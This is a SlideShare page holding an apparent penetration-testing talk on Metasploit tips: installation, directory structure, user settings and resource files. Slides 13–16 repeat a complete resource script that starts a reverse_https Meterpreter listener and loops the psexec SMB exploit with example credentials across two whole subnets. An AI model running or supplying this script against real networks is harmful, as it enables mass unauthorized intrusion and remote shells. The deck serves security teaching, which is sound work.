Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Metasploit magic the dark coners of the framework

1.923 visualizaciones

Publicado el

  • Sé el primero en comentar

Metasploit magic the dark coners of the framework

  1. 1. Metasploit Magic A little sleight of hand
  2. 2. But first...
  3. 3. Installing Metasploit svn co https://metasploit.com/svn/trunk msf
  4. 4. not.. here
  5. 5. ESPECIALLY not here
  6. 6. it is a SYN
  7. 7. SRSLY!
  8. 8. here is ok ;-)
  9. 9. and remember... this isn’t the only place you can install it...
  10. 10. Directory Structure HACKING msfd msfrpcd documentation msfmachscan psexec.rc msfconsole msfrpc armitage msfgui plugins data msfpescan scripts msfcli tools README msfencode bins modules msfpayload external msfelfscan msfupdate lib msfopcode
  11. 11. ~/.msf3/ • history, logs, loot • msfconsole.rc • YOUR SETTINGS • modules • YOUR MODULES
  12. 12. resource files line by line script can understand ruby for meterpreter sessions now! ./msfconsole -r psexec.rc msf> resource psexec.rc
  13. 13. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  14. 14. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  15. 15. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  16. 16. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  17. 17. magic • user .*psexec
  18. 18. other fun... • script • color = false • screen
  19. 19. meterpreter>guid • twitter.com/mubix • mubix[hak5.org]

×